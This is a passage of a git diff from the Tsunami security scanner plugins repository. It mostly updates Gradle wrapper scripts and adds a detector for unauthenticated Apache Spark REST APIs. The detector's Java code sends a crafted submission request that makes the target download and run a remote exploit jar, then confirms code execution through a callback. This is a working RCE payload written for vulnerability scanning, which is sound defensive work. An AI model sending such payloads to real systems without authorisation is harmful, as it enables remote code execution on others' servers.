OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/nacos_cve_2021_29441/gradlew.bat b/community/detectors/nacos_cve_2021_29441/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/nacos_cve_2021_29441/gradlew.bat +++ b/community/detectors/nacos_cve_2021_29441/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/papercut_ng_mf_cve_2023_27350/gradle/wrapper/gradle-wrapper.properties b/community/detectors/papercut_ng_mf_cve_2023_27350/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/community/detectors/papercut_ng_mf_cve_2023_27350/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/papercut_ng_mf_cve_2023_27350/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/rce/apache_spark_exposed_api/README.md b/community/detectors/rce/apache_spark_exposed_api/README.md new file mode 100644 index 000000000..336167ff1 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/README.md @@ -0,0 +1,23 @@ +# Apache Sparks exposed API + +This detector checks for exposed Apache Spark API servers. + +This API server, which does not have authentication enabled, is exposed if an +Apache Sparks instance has the environment variable `spark.master.rest.enabled: +true` set upon startup. + +An attacker can exploit this API to gain remote code execution by submitting a +malicious Apache Sparks task, which dynamically loads attacker-controlled code. + +Exploit of this issue requires a POST request to the following URI: +`http://:6066/v1/submissions/create` + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/rce/apache_spark_exposed_api/build.gradle b/community/detectors/rce/apache_spark_exposed_api/build.gradle new file mode 100644 index 000000000..e50d7b819 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/build.gradle @@ -0,0 +1,70 @@ +plugins { + id 'java' +} + +description = 'Tsunami VulnDetector plugin to detect an exposed Apache Spark API service.' +group 'com.google.tsunami' +version '1.0-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + okhttpVersion = '3.12.0' + autoValueVersion = '1.7' + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' +} + +dependencies { + implementation "com.google.auto.value:auto-value-annotations:${autoValueVersion}" + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + annotationProcessor "com.google.auto.value:auto-value:${autoValueVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} diff --git a/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.jar b/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..e6441136f Binary files /dev/null and b/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.properties b/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/rce/apache_spark_exposed_api/gradlew b/community/detectors/rce/apache_spark_exposed_api/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/gradlew @@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/rce/apache_spark_exposed_api/gradlew.bat b/community/detectors/rce/apache_spark_exposed_api/gradlew.bat new file mode 100644 index 000000000..25da30dbd --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/gradlew.bat @@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/rce/apache_spark_exposed_api/settings.gradle b/community/detectors/rce/apache_spark_exposed_api/settings.gradle new file mode 100644 index 000000000..0edb48645 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/settings.gradle @@ -0,0 +1,2 @@ +rootProject.name = 'apache_sparks_exposed_api' + diff --git a/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetector.java b/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetector.java new file mode 100644 index 000000000..d3ae700f0 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetector.java @@ -0,0 +1,165 @@ +package com.google.tsunami.plugins.detectors.rce.apachesparksexposedapi; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import java.util.regex.Pattern; +import javax.inject.Inject; + +/** A Tsunami plugin for detecting Exposed Apache Spark API. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "ApacheSparksExposedApiVulnDetector", + version = "0.1", + description = + "This plugin detects an exposed Apache Spark API which can lead to remote code execution" + + " (RCE)", + author = "Timo Mueller (work@mtimo.de)", + bootstrapModule = ApacheSparksExposedApiVulnDetectorBootstrapModule.class) +public final class ApacheSparksExposedApiVulnDetector implements VulnDetector { + + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + public static final String VULNERABLE_PATH = "v1/submissions/create"; + private static final Pattern VULNERABILITY_RESPONSE_PATTERN = + Pattern.compile("Driver successfully submitted"); + private static String httpPayloadBodyFormatString = + "{\"action\":\"CreateSubmissionRequest\",\"clientSparkVersion\":\"1\",\"appArgs\":[\"%s\"]," + + "\"appResource\":\"%s\",\"environmentVariables\":{\"SPARK_ENV_LOADED\":\"1\"},\"mainClass\":\"Tsunami\"," + + "\"sparkProperties\":{\"spark.jars\":\"%s\",\"spark.driver.supervise\":\"false\",\"spark.app.name\":\"Tsunami\"" + + ",\"spark.eventLog.enabled\":\"true\",\"spark.submit.deployMode\":\"cluster\",\"spark.master\":\"spark://localhost:6066\"}}"; + private static final String JAR_PAYLOAD_URI = + "https://github.com/google/tsunami-security-scanner-plugins/raw/master/payloads/apache_spark_exposed_api/Tsunami_Apache_Spark_Exploit.jar"; + private static String interactionUriFormatString = "%s"; + + @Inject + ApacheSparksExposedApiVulnDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("ApacheSparksExposedApiVulnDetector starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + return exploitUri(networkService); + } + + private boolean exploitUri(NetworkService networkService) { + String targetUri = + NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + VULNERABLE_PATH; + + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY) + .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY) + .build(); + Payload payload = payloadGenerator.generate(config); + + String interaction_uri = String.format(interactionUriFormatString, payload.getPayload()); + + String finished_payload = + String.format( + httpPayloadBodyFormatString, interaction_uri, JAR_PAYLOAD_URI, JAR_PAYLOAD_URI); + + try { + + HttpResponse response = + httpClient.send( + post(targetUri) + .setHeaders( + HttpHeaders.builder() + .addHeader("Content-Type", "application/json") + .addHeader("User-Agent", "TSUNAMI_SCANNER") + .build()) + .setRequestBody(ByteString.copyFrom(finished_payload, "utf-8")) + .build(), + networkService); + if (response.status() == HttpStatus.OK && response.bodyString().isPresent()) { + String responseBody = response.bodyString().get(); + if (VULNERABILITY_RESPONSE_PATTERN.matcher(responseBody).find()) { + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10)); + return payload.checkIfExecuted(); + } + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); + } + return false; + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("Apache_Spark_Exposed_Api")) + .setSeverity(Severity.CRITICAL) + .setTitle("Exposed Apache Spark API which allows unauthenticated RCE detected.") + .setDescription( + "An exposed Apache Spark API allows an unauthenticated attacker to submit a" + + " malicious task. If an Apache Spark worker processes such a task, it" + + " loads and executes attacker-controlled content from an external" + + " resource. This allows an attacker to execute arbitrary Java Code within" + + " the context of the worker node.") + .setRecommendation( + "Don't expose the Apache Spark API to unauthenticated attackers.")) + .build(); + } +} diff --git a/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorBootstrapModule.java b/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorBootstrapModule.java new file mode 100644 index 000000000..e69092925 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorBootstrapModule.java @@ -0,0 +1,27 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package 